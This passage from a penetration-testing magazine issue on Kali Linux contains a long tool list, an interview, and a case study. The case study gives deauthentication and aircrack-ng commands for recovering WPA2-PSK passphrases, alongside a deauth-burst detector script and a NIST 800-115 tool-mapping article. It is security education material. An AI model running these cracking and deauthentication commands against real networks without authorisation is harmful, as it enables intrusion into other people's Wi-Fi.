G.I.M.P. or some other screen-capture and image-editing software for capturing the evidence from the other tools.
EtherApe: there isn't any other tool that gives such a good visual idea of network traffic by protocol, bandwidth and connection origin and destination (Figure 17). This screen-capture of EtherApe was captured with G.I.M.P.

All the Tools (De-Duplicated)

0trace casefile
acccheck cdpsnarf
ace cewl
affcat chkrootkit
affcompare chntpw
affconvert cisco-auditing-tool
affcopy cisco-global-exploiter
affcrypto cisco-ocs
affdiskprint cisco-torch
affinfo clang
affsign clang++
affstats cmospwd
affuse copy-router-config
affverify cowpatty
affxml creepy
Aircrack-ng crunch
alive6 cryptcat
android-sdk cudahashcat-plus
apache2 cutycapt
apache-users cymothoa
apktool darkstat
arachni_web davtest
arduino dbd
armitage dbpwaudit
arping dc3dd
asleap dc3dd
autopsy dcfldd
baksmali dcfldd
bbqsql ddrescue
bed deblaze
Figure 16. Kali Install
BeEF denial
beef detect_sniffer6
binwalk detect-new-ip6
blindelephant dex2jar
blkcat dff
blkls dhcpig
blkstat dictstat
bluelog dirb
bluemaho dirbuster
blueranger dmitry
braa dnmap-client
btscanner dnmap-server
bulk_extractor dns2tcpc
bully dns2tcpd
burpsuite dnschef
cachedump dnsdict6
cadaver dnsenum
Figure 17. EtherApe



dnsmap fping kismet openvas initial setup
dnsrecon fragmentation6 lbd openvas-gsd
dnsrevenum6 fragroute Lsadump ophcrack
dnsspoof fragrouter lynis ophcrack-cli
dnstracer fsstat macchanger oscanner
dnswalk ftest macof owasp-zap
dos-new-ip6 fuzz_ip6 mactime-sleuthkit p0f
Dradis galleta magicrescue padbuster
dradis genkeys magictree paracite6
driftnet genpmk mailsnarf paros
dsniff giskismet maltego pasco
eapmd5pass grabber maskgen passive_discovery6
edb-debugger guymager md5deep patator
enumiax hamster mdb-export pdf-parser
ettercap-graphical hashcat mdb-hexdump pdgmail
evilgrade hash-identifier mdb-parsecsv peepdf
ewfacquire hexinject mdb-sql pev
ewfacquirestream hexorbase mdb-tables phrasendrescher
ewfexport hfind mdk3 pipal
ewfverify hping3 medusa plecost
exploit6 HTTP merge-router-config policygen
extundelete hydra metagoofil powerfuzzer
fake_advertise6 hydra-gtk metasploit framework powersploit
fake_dhcps6 icat-sleuthkit miranda protos-sip
fake_dns6d ifind miredo proxychains
fake_dnsupdate6 ikat missidentify proxystrike
fake_mipv6 ike-scan mitmproxy proxytunnel
fake_mld26 ils-sleuthkit mmcat ptunnel
fake_mld6 img_cat mmls pwdump
fake_mldrouter6 implementation6 mmstat pwnat
fake_router26 implementation6d msgsnarf pyrit
fake_router6 intersect multiforcer rabin2
fake_solicitate6 intrace MySQL radare2
fang inundator mysql radiff2
fcrackzip inverse_lookup6 nbtscan rafind2
fern-wifi-cracker inviteflood ncat ragg2
ferret iodine ncrack ragg2-cc
ffind irpass-cdp netdiscover rahash2
fierce istat netmask rainbowcrack
fiked jad netsniff-ng randicmp6
fimap javasnoop NFC Tools rarun2
findmyhash jaxflood nikto rasm2
flasm jboss-autopwn-linux nmap rax2
flood_advertise6 jboss-autopwn-win nmap * rcracki_mt
flood_dhcpc6 jcat oclhashcat-lite readpst
flood_mld26 jigsaw oclhashcat-plus reaver
flood_mld6 jls ohrwurm rebind
flood_mldrouter6 john (the ripper) ollydbg recordmydesktop
flood_router26 johnny onesixtyone recoverjpeg
flood_router6 joomscan OpenVAS redir6
flood_solicitate6 keepnote openvas reglookup
fls keimpx openvas check setup responder
foremost kill_router6 openvas feed update responder

RFIDiot ACG sslstrip wifiarp yersinia
RFIDiot FROSCH sslyze wifidns ywofi
RFIDiot PCSC stunnel4 wifi-honey zbassocflood
rifiuti sucrack wifiping zbdsniff
rifiuti2 svcrack wifitap zbdump
rsmangler svcrash wifite zbfind
rsmurf6 svmap wireshark zbgoodfind
rtpbreak svreport wol-e zbreplay
rtpflood svwar wpscan zbstumbler
rtpinsertsound swaks xprobe2 zenmap
rtpmixsound t50 xsser
safecopy tcpflow
samdump2 tcpreplay
sbd termineter
scalpel thcping6
scrounge_ntfs thc-pptp-bruter
sctpscan thc-ssl-dos
searchsploit theharvester
se-toolkit tlssled
sfuzz tnscmd10g
sidguesser trace6
siege truecrack
sigfind truecrypt
siparmyknife tsk_comparedir
sipcrack tsk_gettimes
sipp tsk_loaddb
sipsak tsk_recover
skipfish u3-pwn
smali ua-tester
smtp-user-enum udptunnel
smurf6 uniscan-gui
sniffjoke unix-privesc-check
snmpcheck update metasploit
socat urlcrazy
sorter urlsnarf
spike-generic_chunked vega
spike-generic_listen_tcp vinetto
spike-generic_send_tcp voiphopper
spike-generic_send_udp volafox
spooftooph volatility
sqldict w3af
sqlmap wafw00f
sqlmap * wapiti
sqlninja webacoo
sqlsus webmitm
srch_strings webscarab
SSH webshag-gui
sshd webslayer
sslcaudit websploit
ssldump webspy
sslh weevely
sslscan wfuzz
sslsniff whatweb

Wolf Halton
Wolf Halton is a Senior PCI Compliance / Vulnerability Engineer, whose company, Atlanta Cloud Technology, performs penetration tests, IT audit functions and private-cloud infrastructure for large financial-services organizations and the financial planning vertical. He co-authored a book on computer security and penetration testing, as well as several articles on cloud-based security. For more information, email Wolf@AtlantaCloudTech.com.



Update: now with STIG auditing

"In some cases Nipper Studio has virtually removed the need for a manual audit." Cisco Systems Inc.

Titania's award winning Nipper Studio configuration auditing tool is helping security consultants and end-user organizations worldwide improve their network security. Its reports are more detailed than those typically produced by scanners, enabling you to maintain a higher level of vulnerability analysis in the intervals between penetration tests.

Now used in over 45 countries, Nipper Studio provides a thorough, fast & cost effective way to securely audit over 100 different types of network device. The NSA, FBI, DoD & U.S. Treasury already use it, so why not try it for free at www.titania.com

Interview with Demóstenes Zegarra Rodríguez
Demóstenes Zegarra Rodríguez is a Ph.D. student in Electronic Systems at the University of Sao Paulo, with solid knowledge in Telecommunication Systems and Computer Science based on 13 years of professional experience in important companies such as Nokia, Microsoft, Celltick and Telefonica.

Since when have you been using Kali and what convinced you to it?
I have used BackTrack Linux since 2009 and nowadays I am using Kali because of the security and testing tools association, with more than 300 penetration testing tools, including vulnerability analysis, web applications, password attacks, wireless attacks, exploitation tools, sniffing and spoofing, reverse engineering, stress testing, hardware hacking, forensic, and others.

What are the positive and negative aspects of Kali you noticed?
The positive aspects are that Kali has common tools as Wireshark, nmap until VoIP tools as rtpflood and sipmyknife. Then, Kali can be considered as a penetration testing platform that provides many features.
I have installed Kali Linux on some computers with no automatic support to some hardware such as video card, but it can be a little common in some Debian-based distributions.

Does Kali serve you for private or professional purposes?
I use Kali Linux for academic studies, to analyze tool performances, such as attack time and efficiency using different wireless security protocols. As an example, you can see a case study at the end of this interview.

What are you using it for?
In the present, I am analyzing the time period to crack wireless passwords and their computational efforts. As a future work, I pretend to study the forensic tools of Kali Linux, because the focus of the distribution is the penetration testing tools, so I want to study if Kali Linux is a complete solution for forensic purposes too.

Which methods do you most frequently use?
I am using a trivial wireless method with the tools aircrack-ng, aireplay-ng, airmon-ng, and airodump-ng; but, in the next studies I will pretend to use all the forensic tools through the Forensic Boot option of the operating system, using more than one method.

What difficulties might surprise a new user? What can you advise them?
The difficulties are only driver support and the ability to work with the penetration tools, because in many cases the users have to use the association of more than one tool to have good results to discover vulnerabilities of software and hardware.

What can you say about the basic tools?
The basic tools are extensively used by network and system administrators, as nmap, Wireshark, chroot, and in a lot of distributions the tools are not installed by default. The use of basic tools is easy because the user, even without much knowledge, can do initial security and intrusion testing in a quick and easy way through the terminal with the tool nmap, for example, discovering the open doors of servers, or the tool Wireshark that can record VoIP conversations or find worms and viruses on the network through anomalous traffic.

Which are the best? Which do you think is most useful?
Nowadays, the use of mobile devices, such as tablets and Android phones, is increasing, so the ARM (Advanced RISC Machine) hardware support is very useful, because you can test your network security through a cellular phone, since the dispositive has a minimum memory of 5 GB free space. A good example of this type of use is when you want to be able to dump the contents of a valid RFID card in the system in order to clone it later on (i.e. test a standard Mifare-based door system). This task could be performed in only a few minutes, and only an ARM device with Kali Linux, an NFC tool and an SD card are necessary.

Do you know any of Kali's unconventional uses?
The use of Kali on the cellular phone where the person began to discover insecurity holes in access points of a University campus. This is not unconventional but it is interesting that with a mobile dispositive you can have a powerful tool.

Who would you recommend it to?
BackTrack is used and recommended in many universities and midsize companies in Brazil, and now it is being migrated to Kali Linux. In general, Kali Linux is recommended to be used by any person who has interest in knowing how safe her/his network is.

Do your friends, including IT specialists, also have a positive opinion about Kali?
Yes, some colleagues working as IT specialists had a good quality of experience using Kali Linux, basically because of its flexibility and high number of tools. The majority of tools included in Kali are already used by IT specialists, and to have an open source distribution with a suite of security and penetration tools is very useful. The forensic tools are already used too because after the use of the forensic boot there are no traces of their use, that is, a computer can be analyzed without risk of damage and insertion of new information.

Kali Linux is definitely a success. What do you think the future holds for the distro?
Kali is a very robust and flexible penetration testing distribution, which is presented in 8 different languages and builds over 300 Debian compliant packages. In the last years, Kali's developers (Offensive Security) have incorporated new important features; as a consequence the worldwide popularity is increasing. For these reasons, I believe that the future of Kali is very promising; of course it is important to consider that the Kali improvements should continue. In this context, developers need to work with clients, such as banking and financial services, government entities, and various technology companies to understand real problems and offer real solutions.

Do you think this is the best method for penetration testing? Should something be changed in Kali?
Sure, some studies show that Kali Linux has a better performance than other current penetration tools. Also, as stated before, Kali offers many free software applications in its main section. Because of the different levels of users' knowledge in networking or OS, Kali tools could improve their installation process. Also, the interface could be improved using some usability criteria.

Have you read our first issue on Kali Linux? Which of the methods described therein are you most interested in?
Yes, I read the Pentesting Wireless with Kali Linux and the Kali Linux on a Raspberry Pi; both methods are very interesting.

What do you think about the future of pentesting?
The advances in technology with new solutions in different areas will bring new security vulnerabilities. Solutions are more complex and the security aspects are generally not developed/implemented in detail because the services need to be rolled out in the market as soon as possible. These facts will expand the vulnerability of security considerably, especially on the web and mobile market.

To conclude, can you describe the method you have used?
I used a method of trivial pentesting wireless using aircrack-ng, aireplay-ng, airmon-ng, and airodump-ng. However, Kali has a lot of tools that can be used in association for the same proposal.

By PenTest Team

Case Study: Analysis of Security and Penetration Tests for Wireless Networks with Kali Linux

The use of wireless networks has been increasing because of the cost of devices and the advantages of mobility. The focus of this study is to perform penetration tests through a Linux distribution, Kali, which has a collection of security and forensics tools. Penetration tests are done in real networks using the WPA2-PSK protocol.
There are many software solutions that work to discover the password of a wireless network. All of them can be found together in a Linux distribution, which is the case of the BackTrack and Kali Linux distributions.
Kali Linux [1] is a Debian-derived Linux distribution and it is the enterprise-ready version of BackTrack Linux.

Figure 1. Kali Linux

The goal of this practical study is to test Kali Linux in breaking a WPA2-PSK protocol.
WPA (Wi-Fi Protected Access) is a protocol for radio communications, designed to be used with an 802.1X authentication server that assigns different keys to each user. However, it can also be used in a less secure mode, Pre-Shared Key (PSK). The PSK is designed for use on home and small office networks in which each user has the same pass phrase. WPA-PSK is also called WPA-Personal.
Kali was installed in a virtual machine with 1 GB RAM and a 50 GB HDD (about 15 minutes of installation), but it can be launched directly from a CD or removable media without installing to disk.
The procedure (commands) below works to break a WPA2-PSK protocol with Kali Linux; in the case of BackTrack the commands are similar [2].

airmon-ng stop wlan0
airmon-ng start wlan0
airodump-ng --channel 6 --write fileWPA wlan0
  fileWPA is the file name where the captured packets will be recorded; thus, it will generate a file fileWPA-01.cap in the current directory. 6 is the channel used by the access point being tested.
aireplay-ng -0 1 -a 00:0A:0A:F0:B1:B1 -c 00:1A:C3:A0:C3:B2 wlan0
  It is necessary to wait to capture the handshake.
aircrack-ng -0 -w wordList.txt fileWPA-01.cap

The command that is necessary to capture the handshake sends a forged packet to the access point, simulating the process of disconnecting the specified client. Mistaken by the packet, the access point disconnects the client, which causes it to re-authenticate, a process carried out automatically by most operating systems. With this, the authentication process will be recorded by the capture started at another terminal.
As a consequence, it captures the sequence of packets needed to discover the passphrase of the network, which is done through the handshake (the exchange of information). Table 1 shows the results obtained during our experimental tests.

Table 1. Time to decrypt a WPA2-PSK
Time (hours)   Wireless antenna name
08:02:31       Wireless X
09:40:11       Wireless Y
07:50:45       Wireless Z
08:34:12       Wireless T

The time needed to recover the WPA2-PSK passphrase was around 8 hours using an Intel Core i5.
Years ago, WPA2-PSK was broken in almost 1 day; today it takes 8-9 hours, because of the processing machine, memory, among other factors.
Furthermore, the most interesting thing about Kali Linux is the number of tools for security and attack tests.

Figure 2. Tools of the Kali Linux Distribution

References
[1] http://www.kali.org
[2] Rodríguez Z. D., Rosa L. R., Sousa J., Analysis of Security and Penetration Tests for Wireless Networks with Backtrack Linux, International Information and Telecommunication System, 2010.
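A defender-side counterpart to the deauthentication step described in the case study, added here as an example that is not part of the article: it parses raw 802.11 management frames, counts deauthentication frames per BSSID/client pair inside a sliding window, and flags the kind of burst that aireplay-ng -0 produces while leaving a single legitimate deauth alone. The frames and timestamps are constructed; only the two MAC addresses are taken from the article's command.

```python
"""Detector for 802.11 deauthentication bursts (added example, not from the article).

Parses raw 802.11 management frames (no radiotap/pcap header), counts
deauthentication frames per (BSSID, client) pair inside a sliding time
window, and reports pairs whose count exceeds a threshold. The capture
below is constructed; only the MAC addresses are taken from the article's
aireplay-ng command.
"""
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 0x0C  # management frame (type 0), subtype 12 = deauthentication


def mac_str(raw: bytes) -> str:
    """Render 6 raw bytes as the colon-separated form used in the article."""
    return ":".join(f"{b:02X}" for b in raw)


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, bssid, reason) for a management frame.

    Returns None for non-management frames and for frames too short to
    carry the fields we read, so truncated captures never raise.
    """
    if len(frame) < 24:  # frame control + duration + 3 addresses + seq ctrl
        return None
    fc = frame[0]
    version = fc & 0x03
    ftype = (fc >> 2) & 0x03
    subtype = (fc >> 4) & 0x0F
    if version != 0 or ftype != 0:
        return None
    addr1, addr2, bssid = mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])
    reason = None
    if subtype == DEAUTH_SUBTYPE:
        if len(frame) < 26:
            return None  # deauth body (2-byte reason code) missing
        reason = int.from_bytes(frame[24:26], "little")
    return subtype, addr1, addr2, bssid, reason


def build_deauth(dst: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Construct a deauthentication frame (used only to build the sample capture)."""
    fc = bytes([DEAUTH_SUBTYPE << 4, 0x00])  # subtype 12, type 0, version 0, no flags
    duration = seq_ctrl = b"\x00\x00"
    return fc + duration + dst + src + bssid + seq_ctrl + reason.to_bytes(2, "little")


def detect_deauth_bursts(frames, window_s: float = 1.0, threshold: int = 10) -> dict:
    """frames: iterable of (timestamp_seconds, raw_802_11_frame).

    Returns {(bssid, client): peak_count} for every pair that saw more than
    `threshold` deauthentication frames within any `window_s` second window.
    A lone deauth (a client really leaving) stays below the threshold.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] != DEAUTH_SUBTYPE:
            continue
        _, addr1, addr2, bssid, _ = parsed
        # aireplay-ng spoofs both directions; the client is whichever side is not the BSSID
        client = addr1 if addr2 == bssid else addr2
        key = (bssid, client)
        window = recent[key]
        window.append(ts)
        while window and ts - window[0] > window_s:
            window.popleft()
        if len(window) > threshold:
            alerts[key] = max(alerts.get(key, 0), len(window))
    return alerts


# Constructed sample: the access point and client MACs quoted in the article's command.
AP = bytes.fromhex("000A0AF0B1B1")      # 00:0A:0A:F0:B1:B1
CLIENT = bytes.fromhex("001AC3A0C3B2")  # 00:1A:C3:A0:C3:B2


def sample_capture():
    """Constructed capture: one legitimate deauth at t=3 s, a beacon at t=5 s,
    then a burst at t=10 s of 64 frames in each direction, modelled on what
    one round of aireplay-ng -0 1 transmits."""
    frames = [(3.0, build_deauth(CLIENT, AP, AP, reason=3))]
    beacon = bytes([0x80, 0x00]) + b"\x00\x00" + b"\xff" * 6 + AP + AP + b"\x00\x00"
    frames.append((5.0, beacon))
    for i in range(64):
        t = 10.0 + i * 0.002
        frames.append((t, build_deauth(CLIENT, AP, AP)))          # AP -> client
        frames.append((t + 0.001, build_deauth(AP, CLIENT, AP)))  # client -> AP (spoofed)
    return frames


def run_sample() -> dict:
    return detect_deauth_bursts(sample_capture())


if __name__ == "__main__":
    for (bssid, client), peak in run_sample().items():
        print(f"deauth burst: bssid={bssid} client={client} peak={peak} frames/s")
```

On a real capture the pcap record and radiotap headers have to be stripped before each frame is passed in, and the threshold should be tuned to the roaming behaviour of the monitored network.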

Demóstenes Zegarra Rodríguez
Demóstenes Zegarra Rodríguez is a Ph.D. student in Electronic Systems at the University of Sao Paulo, with solid knowledge in Telecommunication Systems and Computer Science based on 13 years of professional experience in important companies such as Nokia, Microsoft, Celltick and Telefonica.

Mapping Kali Usage to


NIST800-115
Kali is an invaluable platform that when coupled with a sound
methodology can make a penetration testers life that much easier.
In some cases Kali provides so many tools that novice penetration
testers may struggle with how all the tools fit together and how
they can be used to truly meet a client or internal customers
penetration test objectives.

I
n this article we will try to shed some light on Penetration Testing Execution Standard
how Kali can be used with a penetration test- (PTES): Standard for penetration testing exe-
ing methodology to streamline the penetration cution along with technical guidelines.
testing process and create a stronger deliverable National Institute of Standards and Technolo-
for the client. While Kali provides a categorization gy: Guide to Security Testing and Assessment
of tools we will take this a step further and pro- (NST 800-115): Guide for conducting techni-
vide clear mapping against a standard penetra- cal security assessments. Contains guidance
tion testing methodology. Along the way we will on techniques and methods that an assessor
look at many tools from a high level as they per- should use when performing an Information
tain to the steps within the methodology. In this Security Assessment.
article we will look at the tools in a high level and
focus specifically on how to utilize the tools within While all three are good methodologies we find
a structured penetration test. We will also visit a that PTES and NIST 800-115 provide a bit more
few of our favorite tools we like to use during our flexibility during our penetration tests. Also, the
penetration tests. methodologies more closely align with whats
taught in security course curriculum such as
The Methodology SANS. For this article we will be using NIST 800-
We cant begin an article about mapping Kali to 115. Both PTES and NIST are similar so it should
a penetration testing methodology without first se-
lecting the methodology. When it comes to pen-
etration testing methodologies you can basically
narrow the field down to three. These are:

Open Source Security Testing Methodology


Manual (OSSTMM): Series of standard tests
designed to deliver results as verified facts
that provide actionable information in order to
strengthen security operations. Figure 1. NIST 800-115 Penetration Test Methodology

EXTRA 05/2013(16) Page 70 http://pentestmag.com


be easy to transition between the two. Also, the folks over at PTES have done a fairly decent job mapping tools to the methodology.
Here is our 60 second overview of the four-stage penetration testing methodology depicted within NIST 800-115 (Figure 1).

Planning
The Planning Phase is where we begin and where we will experience our first little roadblock. This phase is focused on tasks such as establishing rules of engagement, objectives, task assignment, testing management, and engagement tracking. If we break this down further we can think in terms of project management and penetration testing documentation.
Kali provides a few tools that can be used for planning and penetration testing documentation. Here is a quick rundown of the tools as well as a brief description (Table 1).

Table 1. Pentest documentation tools
Tool / Capability | Description
Dradis | Open-source framework for sharing information during a penetration test.
Keep-note | Cross-platform note taking application.
* Redmine | Open-source web-based project management tool.

Discovery
The next step, and one of the most important steps in the penetration testing methodology, is discovery. The interesting thing about discovery is that it is a constant cycle during a penetration test. You are typically re-engaging the discovery phase within the Attack process to perform privilege escalation or to pivot and attack other systems until the objectives have been met.
The discovery phase consists of two parts. The first part is information gathering and scanning. During this part of the engagement the team identifies as much information about the company, people, systems, services, and applications as possible. The second part is vulnerability analysis, where the testing team synthesizes all the information gathered in part 1 of discovery to identify vulnerabilities and possible attack vectors. The discovery phase is one of the most important phases and can and should be repeated as the penetration test progresses into the Attack phase.

Information Gathering and Scanning
Kali contains many tools that can be used for information gathering and open-source intelligence gathering (OSINT). Here is a quick breakdown of the tools (Table 2).

Table 2. Information gathering tools
Tool / Capability | Description
Maltego | Maltego is an open-source intelligence and forensics application developed by Paterva. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining.
TheHarvester | The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and the SHODAN computer database.
Creepy | Creepy is a geolocation tool that helps social engineers perform successful information gathering.
Dmitry | DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux command line application coded in C. Dmitry is used to gather information such as sub-domains, email addresses, whois lookups, etc.
Jigsaw | Email enumeration tool that accesses the Jigsaw business directory. Can also be used to generate email addresses using common formats.
Metagoofil | Information gathering tool designed for extracting metadata of public documents (pdf, doc, xls, ppt, docx, pptx, xlsx) belonging to a target company.

Kali has many tools we could use to meet various scanning requirements. Here is a quick table broken out by requirement type (Table 3).

Vulnerability Analysis
During vulnerability analysis we review information gathering and scanning data to identify possible attack vectors. Typically, this involves reviewing service and OS version information against online vulnerability databases. We can also identify vulnerabilities through automated tools provided by Kali.
We've included a table of these tools below (Table 4). Please note that we did include additional tools that could be installed (the tools marked with an asterisk). Keep in mind that Kali is Linux and most things that can be installed on a Linux platform will install on Kali. It's not unusual for us to install Nessus right after installing Kali on our primary penetration testing systems.



Table 3. Scanning tools
Technique | Tool / Capability | Description
Network Discovery | Fierce.pl | DNS interrogation tool. Uses several techniques including DNS zone transfers, DNS brute-force, and DNS reverse lookups.
Network Discovery | dnsdict6 | Utility used to enumerate IPv6 domains.
Network Discovery | Fping/fping6 | Ping on steroids. Has the ability to query systems via ICMP.
Network Port and Service Identification | dnmap | Distributed nmap framework with client and server components. Map hosts, ports, and services across networks.
Network Port and Service Identification | nmap | Map hosts, ports, and services across networks. Also has the ability to run scripts to identify vulnerabilities.
Network Port and Service Identification | hping3 | Hping3 is a network tool able to send custom TCP/IP packets and to display target replies like the ping program does with ICMP replies.
Wireless Discovery / Scanning | Kismet | An 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system.
Wireless Discovery / Scanning | Wireshark | A network protocol analyzer for Unix and Windows.
Web Application Discovery / Scanning | Burpsuite | An integrated platform for performing security testing of web applications.
Web Application Discovery / Scanning | Webscarab | A framework for analysing applications that communicate using the HTTP and HTTPS protocols.
Web Application Discovery / Scanning | Nikto | An Open Source (GPL) web server scanner which performs comprehensive tests against web servers.

Table 4. Vulnerability analysis tools
Technique | Tool / Capability | Description
Vulnerability Scanning | Nmap -sC or --script | Switches used to initiate vulnerability scanning with nmap.
Vulnerability Scanning | OpenVAS | Open-source vulnerability scanner. A fork of the Nessus project.
Vulnerability Scanning | *Nessus | Commercial vulnerability scanner.
Database Vulnerability Scanning | oscanner | An Oracle assessment framework developed in Java.
Database Vulnerability Scanning | Tnscmd10g | Tool used to gather information from the TNS listener port.
Network Vulnerability Scanning | Cisco-global-exploiter | An advanced, simple and fast security testing tool / exploit engine that is able to exploit 14 vulnerabilities in disparate Cisco devices.
Network Vulnerability Scanning | Yersinia | A network tool designed to take advantage of some weaknesses in different network protocols.
Web Vulnerability Scanning | Arachni | A Free/Open Source Web Application Security Scanner Framework.
Web Vulnerability Scanning | W3af | A Web Application Attack and Audit Framework.
Web Vulnerability Scanning | Owasp-zap | The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
Fuzzing Tools | bed | BED (aka Bruteforce Exploit Detector) is a plain-text protocol fuzzer that checks software for common vulnerabilities like buffer overflows, format string bugs, integer overflows, etc.
Fuzzing Tools | spike | API for fuzzer development written in C.

Attack
If you have done your homework during the Discovery phase then hopefully the initial part of the Attack phase will go smoothly and successfully. In this section we are going to map all the Kali tools to the different parts of the Attack phase of NIST 800-115.
Here is a summary of the Attack phase and its various parts. Keep in mind that we will continue to revisit the Discovery phase throughout the course of the penetration test (Figure 2).

Figure 2. NIST 800-115 Penetration Test Methodology Attack Phase

Gaining Access
Kali has several tools that can assist with gaining access to systems and networks. Most people, including us, will immediately launch Metasploit; however, there are several other tool-sets that can be leveraged. To make things a bit more straightforward we have broken these tool-sets out based on various attack vectors (Tables 5-8).

Table 5. Password Attacks
Tool / Capability | Description
Hydra/gtk-hydra | Network logon cracker which supports many different services.
Dbpwaudit | A Java tool that allows you to perform online audits of password quality for several database engines.
Cisco-audit-tool | Script which scans Cisco routers for common vulnerabilities.
Onesixtyone | An SNMP scanner which utilizes a sweep technique to achieve very high performance.
Acccheck | Script for checking default logins on Windows.
John | Offline dictionary and brute-force cracking tool.
Ophcrack | A Windows password cracker based on Rainbow Tables.

Table 6. Vulnerability Exploitation
Tool / Capability | Description
Metasploit | Penetration testing and exploitation framework.
Searchsploit | Script used to search Exploit-DB exploits.
Social Engineering Toolkit | An open-source Python-driven tool aimed at penetration testing around Social-Engineering.

Table 7. Wireless Attacks
Kali Tool / Capability | Description
Aircrack-ng | An 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured.
Fern | A wireless security auditing and attack software program written using the Python programming language and the Python Qt GUI library. The program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Table 8. Web Attacks
Tool / Capability | Description
Browser Exploitation Framework (BeEF) | A penetration testing tool that focuses on the web browser.
Sqlninja | A tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Bbqsql | SQL injection exploitation tool.

Escalating Privilege
Once we have gained user level access to a system, 9 times out of 10 we want to escalate our privilege to gather more sensitive information such as passwords or restricted data. We will usually perform some of the same Discovery phase processes in order to identify and exploit additional vulnerabilities. You will notice that we have repeated several tools from previous tables; however, we have provided some additional descriptions that are more relevant to this phase of the process (Table 9).

Table 9. User-access-level discovery tools
Tool / Capability | Description
Unix-privesc-check | Unix-privesc-check is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
lynis | An auditing tool for Unix (specialists). It scans the system and available software to detect security issues.
enum4linux | A tool for enumerating information from Windows and Samba systems.
Metasploit | Penetration testing and exploitation framework. Metasploit has several modules that can assist with privilege escalation.
Searchsploit | Script used to search Exploit-DB for local privilege escalation exploits.

EXTRA 05/2013(16) Page 73 http://pentestmag.com


Table 10. System Browsing
Tool / Capability | Description
windows-binaries | Folder in Kali with multiple Windows exploits and binaries.
Sbd.exe | An encrypted version of netcat.
nc.exe | Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a Swiss-army knife for TCP/IP. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
Metasploit/Meterpreter | Exploitation framework with additional modules to gather information once compromised.

Table 11. Install Additional Tools
Tool / Capability | Description
atftpd | Linux TFTP daemon that can be used to upload and download files from target systems.
apache | Web server that can be used to deliver additional tools to a compromised host.

Reporting
Lastly, we need to take all the data from various tools as well as our manual observations and screenshots to create a report. A typical penetration test report will have two audiences: a non-technical audience that needs enough details to understand the problem and make management level decisions to address the risk (think resources and budget), and the technical audience who will be responsible for mitigating the findings (Table 12).

Table 12. Reporting tools
Tool / Capability | Description
Dradis | Open-source framework for sharing information during a penetration test. Dradis allows you to output gathered information in HTML and Word.
MagicTree | MagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and (yeah!) report generation.

Putting It All Together
Now let's put everything together with an example penetration test. In this example we will sample a few Kali tools while following the penetration test methodology discussed in NIST 800-115.

Planning
We begin in the planning phase of our methodology. If you are working on a larger engagement and need a collaborative solution then Dradis is the tool of choice. It provides capabilities for centralized documentation, team collaboration, and most importantly the ability to import information from our various tools within Kali. There are two versions of Dradis, a community version and a commercial version. As you can guess the version on Kali is the community version.
Let's run through a quick example and fire up Dradis to create our project structure. When you first launch Dradis you will be greeted with an initialization screen. Give the server a password and select the option to create a new project (Figure 3).

Figure 3. Dradis Initialization

Once you log in with no username and the server password you will be dropped into the Dradis framework console. From there we will implement our penetration testing methodology and plan by adding branches and notes. Since we have a lot to cover I will leave it up to the reader to research more on Dradis.
Within a few minutes we have mapped out our project tasks, Rules of Engagement, objectives, and remaining methodology steps (Figure 4).

Figure 4. Dradis Console with NIST 800-115 Penetration Test Methodology

Dradis is a great tool, but don't expect it to be a full-fledged project management suite. If you need more firepower don't forget that Kali has a number of pre-installed applications such as Ruby and MySQL. With this in mind you're a few steps away from setting up Redmine to add resource planning and Gantt charts to your Kali instance.
Now that we have our project planning and documentation mechanism in place we can move on to the next phase of the penetration testing methodology, and that's discovery.

Discovery
We decide to kick off the Discovery phase by running TheHarvester. TheHarvester is written by Christian and allows us to collect information about a target organization from a variety of sources including Google, Facebook, LinkedIn, Spoke, etc. Let's take a look at TheHarvester a bit closer (Figure 5).

Figure 5. TheHarvester Options

The screenshot shows TheHarvester options and some example usage. In the next example we'll run TheHarvester against our target domain querying Bing. We also want to ensure we limit our returned results to 100. The command and its output would look something like Figure 6.
With these options selected TheHarvester will query Bing for our domain looking for email addresses as well as additional linked domains. The -n and -t options tell TheHarvester to perform reverse DNS lookups on the IP range identified for the domain queried as well as to expand the search for our domain across all top level domains. For example, if our domain was nbc.com it would attempt to find domains such as nbc.ca, nbc.biz, etc.

Figure 6. TheHarvester Output

TheHarvester can pull together a significant amount of information that we can use during the scanning phase of Discovery, but in this case we decide to utilize some additional tools to further our Information Gathering efforts prior to moving on to scanning.
At this point we decide that we want to interrogate DNS a bit more with the information gathered from TheHarvester. Because of its features we have chosen to run our domains through Fierce. Fierce can initiate DNS zone transfer attempts as well as perform brute-force lookups against DNS. While TheHarvester can perform DNS brute-forcing as well, Fierce contains added functionality and more granular options such as controlling the number of threads used for execution. Here are the Fierce options along with the output from our target domain. Please note that the output here may not be ideal given the test domain that we are using for this example (Figure 7).

Figure 7. Fierce Example

With this information in hand we can now import the output from the tools into Dradis and move on to scanning, enumerating services, and vulnerability identification.
